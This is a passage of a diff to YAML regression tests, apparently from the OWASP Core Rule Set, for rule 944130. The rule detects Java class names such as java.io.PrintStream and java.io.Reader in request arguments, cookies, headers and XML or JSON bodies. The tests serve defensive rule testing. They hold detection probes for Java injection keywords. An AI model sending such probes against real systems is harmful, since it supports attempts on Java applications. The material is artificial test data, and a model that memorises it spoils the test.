"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_id: 218 desc: "Content-Type text/plain includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log_contains: "id \"944130\"" + - test_id: 219 desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 220 desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 221 desc: "Argument test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_id: 222 desc: "Argument name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 223 desc: "Cookie test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 224 desc: "Cookie name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PrintStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 225 desc: "Request header test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 226 desc: "XML attribute value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-227 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 227 desc: "XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_id: 228 desc: "Nested XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-229 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_id: 229 desc: "Content-Type text/plain includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-230 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log_contains: "id \"944130\"" + - test_id: 230 desc: "Content-Type application/json arg value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PrintStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-231 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PrintStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 231 desc: "Content-Type application/json arg name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PrintStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-232 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PrintStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 232 desc: "Argument test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-233 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 233 desc: "Argument name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-234 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 234 desc: "Cookie test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 235 desc: "Cookie name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PushbackInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 236 desc: "Request header test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 237 desc: "XML attribute value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 238 desc: "XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 239 desc: "Nested XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 240 desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 241 desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PushbackInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PushbackInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 242 desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PushbackInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 243 desc: "Argument test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-244 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_id: 244 desc: "Argument name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log_contains: "id \"944130\"" + - test_id: 245 desc: "Cookie test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 